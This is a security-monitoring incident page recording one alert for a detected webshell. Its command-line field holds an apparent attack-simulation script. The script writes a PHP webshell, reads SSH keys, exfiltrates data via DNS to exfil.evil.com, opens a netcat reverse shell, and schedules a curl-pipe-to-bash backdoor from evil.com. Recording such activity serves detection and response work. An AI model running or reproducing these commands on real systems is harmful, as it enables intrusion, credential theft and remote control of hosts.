Back to list

Medium CINC-20251220-D14DA8F5 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:13059059100

Incident ID CINC-20251220-D14DA8F5

Severity Medium (70)

Status new

Alert Count 1

Host Count 1

First Seen 2025-12-13 17:57:13

Last Seen 2025-12-13 17:57:13

Duration 0d 0h 0m

Created 2025-12-20 13:23

Updated 2026-01-13 15:14

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Severity	Status	Hostname	Description	Tactic	Command Line	Time
High	new	localhost.localdomain	A webshell has been detected on your host. It may provide adversaries a set of functions to execute or a command-line interface on the system. Please check the process tree to determine if malicious commands were executed or if this access was expected.	Persistence	bash -c echo '[1] Webshell PHP 파일 생성...' echo '<?php system($_GET["c"]); ?>' > /tmp/webshell.php echo '[2] SSH Key 탈취 시도...' cat ~/.ssh/id_rsa 2>/dev/null \|\| find /home -name 'authorized_keys' -exec cat {} \; 2>/dev/null \| head -5 echo '[3] Data exfiltration via DNS...' dig $(hostname \| base64).exfil.evil.com 2>/dev/null \|\| true echo '[4] Mimikatz-style memory dump...' strings /proc/*/maps 2>/dev/null \| grep -i password REDACTED head -3 echo '[5] Process hollowing 시뮬레이션...' cp /bin/bash /tmp/.hidden_process /tmp/.hidden_process -c 'echo shell spawned' 2>/dev/null rm -f /tmp/.hidden_process echo '[6] Netcat reverse shell...' nc -e /bin/sh 10.10.10.10 4444 2>/dev/null & sleep 1 echo '[7] At job persistence...' echo '/bin/bash -c "curl http://evil.com/backdoor \| bash"' \| at now + 1 minute 2>/dev/null \|\| true echo 'Done on server 63'	12-13 17:57